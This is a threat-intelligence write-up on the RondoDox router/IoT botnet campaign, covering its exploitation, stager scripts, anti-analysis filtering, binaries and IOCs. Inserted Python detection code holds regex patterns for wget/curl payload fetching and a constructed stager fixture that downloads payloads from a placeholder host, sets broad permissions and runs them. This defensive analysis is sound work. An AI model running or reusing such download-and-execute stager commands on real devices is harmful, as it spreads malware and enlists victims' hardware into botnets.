SOCcare December 2025: RondoDox Campaign: Routers Beware

During a recent threat-hunting exercise, something caught my eye: repeated references to the term “Rondo.” At first, I dismissed it as normal background radiation – after all, “Rondo” is also the name of a well-known Lithuanian music band. But as I dug deeper, it revealed several noteworthy twists.

Initial foothold

In our field of view, the campaign first appeared on 15 November 2025 and remains active at the time of writing. The threat actor primarily targets routers and other IoT devices by exploiting publicly known vulnerabilities – such as Asus WRT LAN Backdoor Command Execution (CVE-2014-9583) and Linksys WAP54G debug.cgi Shell Access as Gemtek (CVE-2010-1573). In total, the actor cycles through more than 50 known vulnerabilities (some with assigned CVE IDs, some unassigned), rapidly testing each one against the exposed devices in a technique commonly referred to as an “exploit shotgun.” The objective is simple: achieve remote code execution to download and run the stager script. In all observed intrusions, the exploitation stage originated from 192[.]159[.]99[.]95, while the stager itself was hosted separately at 74[.]194[.]191[.]52. Analysis of the hosting infrastructure suggests this IP (74[.]194[.]191[.]52) is likely a compromised Ubiquiti UniFi router.

Stager scripts

Across the campaign, we observed 15 stager scripts, all following the naming pattern rondo.{three_letters}.sh.

Each script is retrieved directly from the attacker-controlled host at: hxxp[://]74[.]194[.]191[.]52/rondo[.]{three_letters}[.]sh

Despite minor differences, the stagers follow a consistent pattern. They first attempt to reduce their footprint by redirecting output to /dev/null, removing temporary files, and cycling through common writable directories such as /tmp, /var/tmp, and /dev/shm. This appears intended to ensure reliable execution on a wide range of IoT or router operating environments.

The scripts then prepare a small working directory, download a set of candidate payloads, assign broad execution permissions, and try running them sequentially. The logic is intentionally simple and architecture-agnostic: whichever payload executes successfully becomes the active component of the RondoDox infection chain.

To prevent conflicts with earlier infections, the stagers also repeatedly terminate any running rondo processes before launching a fresh instance.
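As an added illustration (not code from the report or from the campaign), the heuristic below scores a shell script against the stager traits just described: output silenced to /dev/null, cycling through /tmp, /var/tmp and /dev/shm, several candidate payloads downloaded and run one after another, broad permissions, and earlier rondo processes killed. The regexes and weights are my own approximations, and the two embedded scripts are constructed fixtures with a placeholder host, not the actual stagers.

```python
import re

# Assumption: these regexes approximate the traits described above; they are
# not signatures from the report, and the weights are illustrative.
STAGER_TRAITS = [
    ("silence_output",     re.compile(r">\s*/dev/null"), 1),
    ("writable_dir_cycle", re.compile(r"cd\s+/tmp\b.*?cd\s+/var/tmp\b.*?cd\s+/dev/shm\b", re.S), 2),
    ("rondo_artifact",     re.compile(r"\brondo\.[A-Za-z0-9_.\-*]+"), 3),
    ("fetch_payload",      re.compile(r"\b(?:wget|curl|tftp)\b"), 1),
    ("broad_permissions",  re.compile(r"\bchmod\s+(?:\+x|[0-7]*7[0-7]*)\b"), 1),
    ("kill_previous",      re.compile(r"\b(?:pkill|killall|kill)\b[^\n]*rondo"), 2),
    ("cleanup_tmp",        re.compile(r"\brm\s+-rf?\b"), 1),
]
FLAG_THRESHOLD = 6  # illustrative cut-off; tune against your own sample set

def count_payload_runs(text):
    """Distinct './name' executions: the stager tries several builds in turn."""
    return len(set(re.findall(r"\./([A-Za-z0-9_.\-]+)", text)))

def analyze_script(text):
    """Return (score, matched_trait_names, flagged) for one shell script."""
    score, hits = 0, []
    for name, pattern, weight in STAGER_TRAITS:
        if pattern.search(text):
            score += weight
            hits.append(name)
    if count_payload_runs(text) >= 2:      # architecture-agnostic try-everything loop
        score += 2
        hits.append("multi_payload_exec")
    return score, hits, score >= FLAG_THRESHOLD

# Constructed fixtures (not real samples). PLACEHOLDER_HOST stands in for the
# download server; the first mimics the described traits, the second is benign.
SAMPLE_STAGER = """#!/bin/sh
cd /tmp || cd /var/tmp || cd /dev/shm
rm -rf rondo.*
wget http://PLACEHOLDER_HOST/rondo.mips >/dev/null 2>&1
wget http://PLACEHOLDER_HOST/rondo.armv7l >/dev/null 2>&1
chmod 777 rondo.*
pkill -9 rondo
./rondo.mips; ./rondo.armv7l
"""
BENIGN_SCRIPT = """#!/bin/sh
cd /var/log || exit 1
find . -name '*.gz' -mtime +30 -delete >/dev/null 2>&1
chmod +x /usr/local/bin/rotate-logs
./rotate-logs
"""
```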

Interesting anti-analysis technique

Collecting the stager scripts and binaries was more challenging than expected. The server behind the campaign applies strict request-filtering logic that quickly bans anything that doesn’t look like a real infected device. A mismatched User-Agent, or a probe of the commented-out rondo.lol path, resulted in an immediate IP ban and a meaningless response (displaying “rondo2012@atomicmail[.]io”) on subsequent requests.

It’s a relatively simple mechanism on the surface, but in practice it’s surprisingly effective – forcing repeated attempts from new IPs and slowing down analysis unless the request flow closely mimics the intended victim’s behavior.

Malware

The final stage of the campaign delivers 18 architecture-specific binaries, enabling the threat actor to compromise a wide variety of routers and IoT devices. The collected samples include:

Architecture family   Specific builds
x86                   x86_64, i686, i586, i486
ARM                   armv4l, armv5l, armv6l, armv7l, armebhf, armeb
MIPS                  mips, mipsel
PowerPC               powerpc, powerpc-440fp
Other                 arc700, sh4, sparc, m68k

All analyzed samples point to a clear goal: the malware is designed to conscript infected devices into a botnet.

Static analysis reveals indicators supporting this, including routines associated with network flooding, command-and-control communication, and device capability detection. One particularly interesting detail is a hard-coded User-Agent:

Mozilla/5.0 (iPhone; CPU iPhone OS 18_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.5 Mobile/15E148 Safari/604.1

This likely allows the malware to masquerade as an iPhone browser during outbound traffic – useful for blending in with legitimate mobile traffic or evading simplistic filtering during DDoS attacks.
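An added example, not part of the original report, that runs the indicators above over constructed web-access log lines: it flags requests for rondo.* paths (the stager naming pattern from the Stager scripts section), the exact hard-coded iPhone User-Agent when it originates from an address in a router/IoT subnet, and the atomicmail User-Agent from the IOC list. The IoT subnet 10.20.0.0/16, the log lines and the log format are assumptions.

```python
import re
import ipaddress

# Indicators quoted from the report (defanged values refanged for matching).
IPHONE_UA = ("Mozilla/5.0 (iPhone; CPU iPhone OS 18_5 like Mac OS X) AppleWebKit/605.1.15 "
             "(KHTML, like Gecko) Version/18.5 Mobile/15E148 Safari/604.1")
BAN_UA_RE = re.compile(r"^Mozilla/5\.0 \((?:rondo2012|bang2013)@atomicmail\.io\)$")
RONDO_PATH_RE = re.compile(r"/rondo\.[a-z0-9_.\-]+$")
# Assumption: the defender knows which subnet holds routers/IoT gear (constructed).
IOT_NETS = [ipaddress.ip_network("10.20.0.0/16")]

# Combined log format: src ident user [time] "method path proto" status size "ref" "ua"
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" \d+ \d+ "[^"]*" "([^"]*)"')

def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    return {"src": m.group(1), "method": m.group(2), "path": m.group(3), "ua": m.group(4)}

def classify(rec):
    """Return the list of RondoDox-related findings for one parsed record."""
    findings = []
    if RONDO_PATH_RE.search(rec["path"]):
        findings.append("rondo_stager_or_payload_path")
    if BAN_UA_RE.match(rec["ua"]):
        findings.append("rondo_ban_response_ua")
    src = ipaddress.ip_address(rec["src"])
    # A genuine iPhone should not be talking from the router/IoT range.
    if rec["ua"] == IPHONE_UA and any(src in net for net in IOT_NETS):
        findings.append("iphone_ua_from_iot_device")
    return findings

def scan(log_text):
    """Return (src, path, findings) for every line that raises at least one finding."""
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        findings = classify(rec) if rec else []
        if findings:
            alerts.append((rec["src"], rec["path"], findings))
    return alerts

# Constructed sample log (not real traffic); only line 4 comes from a non-IoT address.
SAMPLE_LOG = "\n".join([
    '10.20.4.17 - - [20/Nov/2025:10:01:02 +0000] "GET /rondo.naz.sh HTTP/1.1" 200 1342 "-" "Wget/1.21"',
    '10.20.4.17 - - [20/Nov/2025:10:01:09 +0000] "GET /rondo.mips HTTP/1.1" 200 98000 "-" "Wget/1.21"',
    f'10.20.4.17 - - [20/Nov/2025:10:02:30 +0000] "GET / HTTP/1.1" 200 512 "-" "{IPHONE_UA}"',
    f'192.0.2.55 - - [20/Nov/2025:10:03:00 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "{IPHONE_UA}"',
    '10.20.9.3 - - [20/Nov/2025:10:04:00 +0000] "GET /update.bin HTTP/1.1" 200 4096 "-" "Mozilla/5.0 (rondo2012@atomicmail.io)"',
])
```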

Additionally, the binaries contain a set of obfuscated strings, such as “steam”, “valve”, and “roblox”. Their purpose is unclear for the time being.

Overall, the malware is tailored for maximum architecture coverage, traffic disguise, and anti-analysis, all of which are consistent with modern botnet-oriented operations.

Conclusion

The RondoDox campaign shows how attackers can exploit unpatched routers and IoT devices to build a botnet, using multi-architecture malware, stager scripts, and clever anti-analysis techniques. The key lesson is simple but crucial: keep your devices updated. Many of these attacks rely on vulnerabilities that have existed for years – regular patching and firmware updates remain the best way to stay protected.

IOCs

  1. IPs:
    • 74[.]194[.]191[.]52
    • 192[.]159[.]99[.]95
  2. URLs:
  3. User-Agents:
    • Mozilla/5.0 (rondo2012@atomicmail[.]io)
    • Mozilla/5.0 (bang2013@atomicmail[.]io)
  4. Emails:
    • rondo2012@atomicmail[.]io
    • bang2013@atomicmail[.]io
    • bang2012@protonmail[.]com
    • makenoise@tutanota[.]de
  5. Hashes:

Written by Justas Kaminskas, CyberSOC Cybersecurity Engineer

The SOCcare project is co-funded by the European Union, alongside our collaborators, NRD Cyber Security and RevelSI, and supported by the European Cybersecurity Competence Centre (ECCC) under Grant Agreement No. 101145843. Views and opinions expressed are however those of the author(s) only and do not necessarily reflect those of the European Union or the European Cybersecurity Competence Centre. Neither the European Union nor the European Cybersecurity Competence Centre can be held responsible for them.
